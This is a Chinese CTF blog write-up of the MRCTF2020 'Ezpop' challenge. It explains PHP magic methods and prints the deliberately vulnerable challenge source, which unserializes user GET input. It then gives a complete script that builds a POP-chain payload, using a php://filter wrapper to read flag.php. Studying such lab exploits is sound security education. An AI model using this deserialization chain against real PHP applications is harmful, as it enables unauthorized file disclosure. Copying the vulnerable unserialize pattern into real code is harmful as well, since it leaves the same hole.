[MRCTF2020]Ezpop|PHP反序列化|POP链

已于 2022-03-07 23:11:15 修改
阅读量1.9k 收藏
点赞数
分类专栏: BUUCTF 文章标签: 网络安全 php
于 2022-03-07 23:04:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hiahiaQ_Q/article/details/123342285
版权

BUUctf有现成环境,这里附上题目链接,也可以在BUU直接搜索

涉及PHP魔术方法

__construct() 当创建对象时触发,一般用于初始化对象,对变量赋初值 
__wakeup() 使用unserialize()时自动触发
__toString() 当一个类被当成字符串使用时触发
__invoke() 当尝试以调用函数的方式调用一个对象时触发
__get() 用于从不可访问的属性(私有或不存在)读取数据

题目分析

//先看下题目给的源码
//要想办法获取到flag.php
class Modifier {
    protected  $var;
    public function append($value){ //定义了方法append,传参value
        include($value); //用include可以进行文件包含
    }
    public function __invoke(){//__invoke 将对象当作函数调用时会自动执行
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){ //构造函数 传入一个字符串参数
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){//__toString 将对象当成字符串使用时会自动执行
        return $this->str->source; 
    }

    public function __wakeup(){//反序列化时自动执行
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){ //从不可访问属性获取数据时自动执行 包括private protected和不存在的属性
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']); //反序列化GET提交的pop
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

大概看了源码,根据要求需要读取到flag.php的内容,分析下现在拥有的条件

  1. 获取到flag.php

  2. 需要给pop参数构造一串字符串,在反序列化后能够得到flag.php

  3. 现在明显能够用来构造的有三个类,类中设置的变量都是能够人为控制的( v a r , var, var,source, s t r , str, str,p)

分析隐含的逻辑(接下来的这段文字请边参照源代码边阅读)

需要读取到flag文件,在上面代码中就只有include能包含文件,也就是要调用append方法,也就是要有一个modifier的实例化对象(假设为对象M)被当作函数调用,这样才能使__invoke方法自动执行;

查看代码,符合条件的就是Test类下的__get方法,能将其中的p变量作为函数执行,那么假设Test类实例化对象为T,则T对象的p属性就得是对象M。当然这里还需要让T对象访问一个不可访问变量(这里没有私有属性,那就需要访问未初始化的属性),现在总共四个可以操作的变量, v a r 要 作 为 文 件 包 含 路 径 , var要作为文件包含路径, varp已使用,就剩下Show类里的 s o u r c e 和 source和 sourcestr,那就来仔细看看Show,只有toString方法可以操作。将$str设为T对象,这样在toString方法中就可以用T调用source,但是T中不存在source,就可以自动执行get方法了。那么接下来就需要让toString执行,而toString的执行需要Show的对象被当作字符串使用,这里有两个条件可以被关联在一起

  1. $source 在show的构造方法中是作为字符串使用的
  2. 正好$source 还未使用,而file是构造方法的一个参数,会赋值给source

那么我们可以将show的对象传给source,因此需要new一个show对象(show2),传递参数show对象(show1,将传给source作为字符串使用)

解题

构造代码如下

/**
1.M T
2.T->p = M
3.$show1->str = T
4.$show2 = new Show($show1)
**/
<?php
	
    class Modifier {
   		protected  $var='php://filter/read=convert.base64-encode/resource=flag.php';//这里使用伪协议,可以读取出完整的文件
	}

	class Show{
        public $source;
        public $str;
    	public function __construct($file){
    $this->source = $file;
    }
   
	}

	class Test{
   		public $p;
    
	}
	$M = new Modifier();
	$T = new Test();
	
	$show1 = new Show('a');
	$show1->str = $T;
	$T->p = $M;
	$show2 = new Show($show1);
	
	$pyl = urlencode(serialize($show2));
    echo $pyl;


?>

总结关键词

  1. include 可以包含PHP伪协议
  2. PHP魔术方法(magic methods)
  3. POP chain(POP链)
吃饭饭l
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf】MRCTF2020-Ezpop小白详解
m0_73860001的博客
03-15 1057
真的很详细
[MRCTF2020]Ezpop-1|php序列化
「 虚幻私塾」
06-30 436
1、打开题目获取到源代码信息,如下: 2、我们的最终目标是获取flag.php中的flag信息,因此分析源代码信息,查看哪里可以获取到flag.php文件,发现在Modifier类中存在include($value),因此想到可以通过php伪协议来获取flag.php的信息,所以现在我们的目的就成了调用append函数,接着往下观察,发现__invoke函数调用了append函数,因此我们只要执行了__invoke函数一样可以获得flag信息,那该怎么执行__invoke函数呢:因此,此时我们应该使用别的函
BUUCTF [MRCTF2020]Ezpop 1
weixin_45642610的博客
04-21 1325
BUUCTF [MRCTF2020]Ezpop 1 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { pr
BUUCTF闯关日记--[MRCTF2020]Ezpop1
qq_64201116的博客
05-14 629
进入页面,熟悉的代码审计 提示了flag.php <?php class Modifier { protected $var; public function append($value){ include($value); } public function __invoke(){ $this->append($this->var); } } class Show{ public $sourc.
[MRCTF2020]Ezpop解析
06-30 304
魔法函数:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用__toString() 会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的当一个对象被当作一个字符串被调用。使用unserialize时触发__get() 用于从不可访问的属性读取数据 #难以访问包括:(1)私有属性,(2)没有初始化的属性。
php json与xml序列化/反序列化
10-26
在Web开发中,数据交换和存储常常涉及到对象的序列化和反序列化PHP提供了多种方式来处理这一过程,其中最常用的两种格式是JSON(JavaScript Object Notation)和XML(eXtensible Markup Language)。这两种格式都...
详解PHP序列化和反序列化原理
10-18
首先,要理解PHP序列化和反序列化的概念。序列化是PHP中将对象或变量的状态信息转换成可以存储或传输的形式的过程,反序列化则是将这些存储或传输后的信息还原成PHP中可以识别的对象或变量的过程。PHP通过serialize...
PHP常见的序列化与反序列化操作实例分析
10-16
PHP编程中,序列化和反序列化是两种非常重要的数据处理技术,它们主要用于将复杂的变量结构转换为可存储或传输的格式,然后再恢复为原始形式。本文将深入探讨这两个概念,结合实例来分析PHP中如何使用`serialize()...
PHP多种序列化/反序列化的方法详解
10-19
PHP中,序列化和反序列化是两种非常重要的数据处理技术。它们允许程序员将复杂的数据结构转换为字符串,便于存储或在网络上传输,然后在需要时恢复原样。本文将详细介绍PHP中几种常见的序列化和反序列化方法。 1....
深入解析PHP中SESSION反序列化机制
10-20
在深入探讨PHP中SESSION的反序列化机制之前,我们需要了解PHP会话的基本概念。PHP会话机制允许我们跟踪访问者在整个网站中的行为,通过一个独特的会话ID(PHPSESSID)来识别每个访问者。会话信息被存储在服务器上,...
PHP反序列化漏洞之pop2
weixin_60719780的博客
02-09 466
但是如果想注入恶意payload,还需要对$test的值进行覆盖,题目中已经给出了序列化,很明显是对类A的$test变量进行覆盖,将POST接收的phpin佛()值覆盖所定义的值,这里也可以传入一句话木马等,利用我们的eval危险函数(任意命令执行)进行执行。在执行unserialize()方法时会触发__wakeup()方法执行,将传入的字符串反序列化后,会替换掉test类里面$test变量的值,将php探针写入flag.php文件中,并通过下面的require引用,导致命令执行。
php反序列化
n1ght的博客
11-30 766
php反序列化,和php的session反序列化php原生类
PHP 魔术方法浅谈
ansong8919的博客
03-23 206
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
BugKuCTF中套路满满的题--------flag.php
qq_42133828的博客
12-24 2372
这道题目主要考察代码审计能力以及序列化和反序列化的知识 首先,什么是序列化,什么是反序列化?简而言之,序列化,就是把对象转化为字节,反序列化就是把字节转化为对象的过程 好了,开始实现解题吧。。。。 首先进入的界面是一个登陆框 然而不论输入什么,提交上去都是没有反应,抓包查看了一下,发现数据包是一个’get‘,所提交的数据更本没有发出去,联想到提示hint,或许这是一个参数,在URL里给...
CTF尝试去读取一下Web目录下的flag.php
diven2的博客
05-28 2336
CTF尝试去读取一下Web目录下的flag.php
ctf php 读取flag,中等难度CTF 提权获取flag 小白已经尝试的思路
weixin_39541693的博客
03-11 1240
本帖最后由 wwr2128 于 2019-3-8 09:09 编辑题目要求:在仅使用程序允许输入的情况下获取高权限shell并获取flag。(不允许使用radare2或者其他可更改程序流的软件,可以注入shellcode)已经尝试的思路:根据初步观察, 应该不属于格式化字符串的bufferoverflow类问题,且文件里面包含一个已经存在的debug function (000006c4 )(详见...
[MRCTF2020]Ezpop PHP反序列化pop的简单构造
Landasika的博客
12-02 903
本人小白入门,不到之处请大侠指点!!! 目录 〇、预备知识点 一、初看题目 二、pop的具体流程 1、反序列化会调用__wakeup函数 2、分析__toString函数 3、__get函数 4、__invoke函数 整体下来看 三、构造payload函数 〇、预备知识点 1、PHP序列化与反序列化的魔术方法及其调用 原理+实践学习(PHP反序列化和Session反序列化)_Lemon's blog-CSDN博客_session反序列化 2、php://filter读取文.
BUUCTF-[MRCTF2020]Ezpop
qwsn
11-19 2440
0x01、Web 1.BUUCTF-[MRCTF2020]Ezpop 第一步:开启题目环境 图略 第二步:访问接,发现一段php代码 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%
[MRCTF2020]Ezpop
SopRomeo的博客
04-16 2308
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cra...
php反序列化pop
最新发布
10-17
PHP反序列化POP是一种利用PHP反序列化漏洞的攻击方式,通过构造恶意的序列化数据,使得反序列化操作在执行过程中触发恶意代码,从而实现攻击目的。POP是一种常见的攻击方式,它利用了PHP魔术方法__wakeup()和__...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值